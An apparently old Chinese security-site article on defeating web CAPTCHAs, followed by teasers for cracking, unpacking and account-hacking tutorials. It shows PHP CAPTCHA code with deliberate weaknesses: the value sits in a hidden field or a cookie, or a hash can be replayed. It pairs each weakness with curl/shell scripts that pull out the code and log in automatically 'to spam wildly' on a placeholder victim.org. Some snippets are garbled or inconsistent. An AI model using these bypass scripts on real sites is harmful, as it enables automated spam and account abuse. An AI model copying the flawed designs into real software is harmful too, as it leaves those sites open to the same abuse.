验证码破解技术                
                
                    所属分类:
                        网络安全 / 加密解密                    
                    阅读数:
                        141
                    
                        收藏 0赞 0分享
                    
                 
                
                    所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息, 
输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。 
很多验证码实现都有问题。比如直接给出用验证码在网页和cookies中。 
验证码在网页中的例子: 
CODE: 
<? 
  /* 
  *   Filename: authpage.php 
  *   Author:   hutuworm 
  *   Date:   2003-04-28 
  *   @Copyleft hutuworm.org 
  */ 
    srand((double)microtime()*1000000); 
    //验证用户输入是否和验证码一致 
    if(isset($HTTP_POST_VARS[’authinput’]))  
    { 
          if(strcmp($HTTP_POST_VARS[’authnum’],$HTTP_POST_VARS[’authinput’])==0) 
                echo "验证成功!"; 
          else 
                echo "验证失败!"; 
    } 
   
    //生成新的四位整数验证码 
    while(($authnum=rand()000)<1000);  
  ?> 
    <form action=authpage.php method=post> 
    <table> 
          请输入验证码:<input type=text name=authinput style="width: 80px"><br> 
          <input type=submit name="验证" value="提交验证码"> 
          <input type=hidden name=authnum value=<? echo $authnum; ?>> 
          <img src=authimg.php?authnum=<? echo $authnum; ?>> 
    </table> 
    </form>  
[Copy to clipboard] 
以上例子直接将验证码储存在负面中,只需下载页面,得到验证码值就可突破限制。 
CODE: 
#!/bin/sh 
curl [url]http://www.vicitm.org/authpage.php[/url] 
authinput=`grep ’<input type=hidden name=authnum value=[[:digit:]]\{4\}>’ grep.txt | sed -e ’s/[^0-9]//g’` #得到网页中的 
authnum 
curl [url]http://www.vicitm.org/authpage.php[/url] -d name=hacker -d submit="验证" -d authnum=$authnum 
[Copy to clipboard] 
  
CODE: 
session_register("authnum"); 
$authnum = strval(rand("1111","9999")); 
setcookie("authnum",$authnum); 
... 
<input type=text name=authnum maxlength=4><img src=get_code.php> 
... 
if($number != $login_check_number || empty($number)) 
{ 
  print("校验码不正确!"); 
  die(); 
} 
[Copy to clipboard] 
第二种要比上一种聪明一点,把验证码值存放在用户Cookies中。可是由于Cookies是用户可读可写,所以也极易被突破。 
CODE: 
#!/bin/sh 
$username=hacker 
$password=hackme 
curl [url]http://www.vicitm.org/index.php[/url] -c common_cookie       # 接受服务器的初始cookies 
curl [url]http://www.vicitm.org/get_code.php[/url] -c $username.cook -b common_cookie # 得到验证码,从cookies中 
authnum=`grep authnum $username.cook | cut -f7` 
curl [url]http://www.victim.org/login.php[/url] -b $username.cook -d authnum=$authnum -d username=$username -d password=$password # 使用 
cookies中的验证码登陆 
[Copy to clipboard] 
更高级的验证码。(好像本论坛的就是这种。。。。) 
有一类验证码比以上两种验证码要高级一些,它使用如下算法: 
1。服务器生成一个随机hash。 
2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字,再转化成图片。 
3。hash在cookie中被发送到客户端 
3。客户以图片输入验证码,进行登录。服务器检查f(hash)=验证码。 
特点:因为攻击者不明白服务器所使用的验证码编码算法,所以无法对服务器转来的hash进行直接解析。 
对付这种验证码,我们可以使用“过期cookies法”,方法即:保存服务器一次特定的cookies,将其对应验证码记下。在每次发送验证消息时 
,强行扔掉服务器传来的cookies,使用这个已被使用过的cookies以及验证码。就好比,一张电话充值卡可以用多次一样。 
如: 
先从服务器上下载一张验证码图片: 
curl http://www.victim.org/get_code.php -c cookie -o auth.png 
人工阅读,得到$savecookie(cookie文件中的hash)和$authnum(验证码)。 
机器人突破验证时,扔掉服务器给的hash,强制使用$savecookie和$authnum进行突破 
CODE: 
$savecookie=294b506f05f896dcbb3a0dde86a5e36c    
$num=7701 
$username=hacker 
$password=hackme 
curl [url]http://www.victim.org/index.php[/url] -c $username.cookie # 得到初始化cookies,以及session id 
grep -v authhash $username.cookie > tmp.$username     # 扔掉服务器给你的hash 
echo "[url]www.victim.org[/url]   FALSE   /   FALSE   0   hash   $savecookie" >> tmp.$username # 强行使用过期hash 和验证码  
mv tmp.$username $username.cookie 
curl [url]http://www.victim.org/login.php[/url] -b $username.cookie -c $username.cookie -d username=$username -d password=$password -d  
authnum=$num # 使用过期验证码登陆。 
#登陆成功,去疯狂灌水。。。。。。 
[Copy to clipboard] 
最高级的验证码。 
它使用如下方法: 
1。服务器通过用户相关信息(IP,SID等等)生成一个随机hash。 
2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字。 
3。hash不再发送给客户端。它被保存到本地数据库(通常是SESSIONS,有关用户IP等信息),并由一个序列号seq所指向。(这个seq也可以 
是session id) 
4。seq被作为cookies发送给客户端。 
5。客户以图片输入验证码。 
5。服务器验证方法:服务器并不检查f(hash)==验证码,而是去读取数据库中期望的验证码。。如果用户输入与期望值相同,则验证 
成功。有些服务器可能还会seq与session id之间的关系进行验继续进行验证。 
6。一旦用户进行了验证操作或重新获取验证码,而是服务器将对数据库中的hash值替换成新的,老值失效过期。 
特点: 
×过期:由于服务器只期望保存在当前数据库中的验证码,所以无法使用“过期”的验证码(因为已被新验证码所替换)。 
×高强度:只发送seq,而hash被保存在本地,所以也极难破译出f(hash)函数。 
弱点:OCR(光学识别) seq劫持 “验证码”DOS(对某些seq进行反复请求,导致某些用户无法进行正常验证) 
对付这种验证码我没有什么好的方法,简便的方法就是自行下载验证码,并给用户显示后登陆。这种适用只验证一次的场合。如登陆时验证。 
CODE: 
curl [url]http://www.victim.org/get_code.php[/url] -c validate.png -c validcode_cookie # 得到验证码图片,和对应seq。 
seq=`grep seq validcode_cookie | cut -f7` 
echo -n 请输入validate.png中的验证码: 
read valid_number # 输入验证码 
# 登陆,并进行某种自动化操作,如疯狂灌水。 
                                    
             
            
                
                Getright 5 手动脱壳和重建IAT--第二部分(图)
在本参考教程的第一部分我们学习了如何正确地转储(dump)Getright 5. 现在我们将要去找神奇跳转,这样IAT会被正确地转储下来,而不用手工修复了. 要完成这一点,我们需要打败程序中的一些陷阱, 并使它们即使在检测到被执行脱壳时也无所作为. 
让我们开始吧! 
第
                    
                    收藏 0赞 0分享
Getright 5 手动脱壳和重建IAT--第一部分(图)
这是一篇Armadillo加壳软件Getright 5.01的脱壳译文,我是参照Ricardo Narvaja的“Getright 5 脱壳和重建IAT”的文章以及Bighead[DFCG][YCG]的译文,一边实践一边再次翻译的。感谢Ricardo Narvaja和Bighea
                    
                    收藏 0赞 0分享
黑客破解Email账号最常用的三种方法
电子邮件并不是安全的,在邮件的发送、传送和接收整个过程中的每个环节都可能存在薄弱环节,恶意用户如果利用其漏洞,就能够轻易的破解出账号,获得邮件内容。
一、利用邮件服务器操作系统的漏洞
邮件服务器软件是运行在特定的操作系统上的,如Linux、Windows NT/20
                    
                    收藏 0赞 0分享
黑客技术之slv unpackme 脱壳
其实壳本身不要紧,问题是vm里面有个校验。
sm同学手下留情,我勉强能搞一个运行正常的,没精力还原vm了。
在virutalfree的retn上f4, 直到[esp]是一个exe image内的地址f7返回:
0040FA91    B8 BE180000     m
                    
                    收藏 0赞 0分享
Allok Video to 3GP Converter 脱壳+破解(图)
①。
下载好安装后,用DIT查看为MoleBox 2.5.x.
-----------------------------------------------------------------------------
OD,载如RUN,程序完全运行后,ALT+M查看内存映
                    
                    收藏 0赞 0分享
有密码 优酷视频 破解方法
优酷网站的视频可以设置独立的播放密码,不过你可知道:观看有密码的优酷视频其实不需要密码哦。下面讲述两种方法进行优酷视频密码破解的方法。 
优酷视频密码破解一: 
打开FLV解析网站,这里推荐使用该站点:http://www.flvcd.com,从浏览器地址栏复制需要解密的优酷
                    
                    收藏 0赞 0分享
                 查看更多